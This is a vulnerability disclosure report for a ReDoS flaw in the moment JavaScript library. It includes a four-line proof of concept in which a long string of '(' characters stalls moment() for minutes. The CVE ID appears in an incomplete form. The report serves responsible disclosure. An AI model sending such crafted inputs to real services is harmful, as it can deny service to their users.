Regular Expression Denial of Service (ReDoS) in moment/moment
Reported on
Jun 6th 2022
Description
Affected versions of the package are vulnerable to Regular Expression Denial of Service (ReDoS) whenever a user-controlled string is passed to it.
An attacker can provide a specially crafted input to the default function moment() that nearly matches the pattern being matched. The regular expression engine then spends a very long time backtracking, occupying the event loop the whole time, so the process cannot serve other requests and the server becomes unavailable (a Denial of Service attack).
Proof of Concept
// PoC.js
// Run against an affected version of moment; the input is a long run of "(" that
// nearly matches the comment pattern, so matching time grows polynomially with length.
const moment = require('moment');
moment("(".repeat(50000));  // local execution time ~=0m1.6s
moment("(".repeat(500000)); // local execution time ~=8m49.741s
Expected behavior
Execution time should be linear in the length of the input, not polynomial.
Impact
Any dependent that passes user-controllable string input to moment() can be subjected to a denial of service. It happens in the default use of the package and potentially affects around 57,775 dependents (last access: June 7 2022).
Hey @Iskren (@maintainer), The fixed version has already been released. Could we fully disclose this report too?
Hi @admin, the vulnerability has been assigned CVE-31129. Could you help to change the CVE ID status of this report?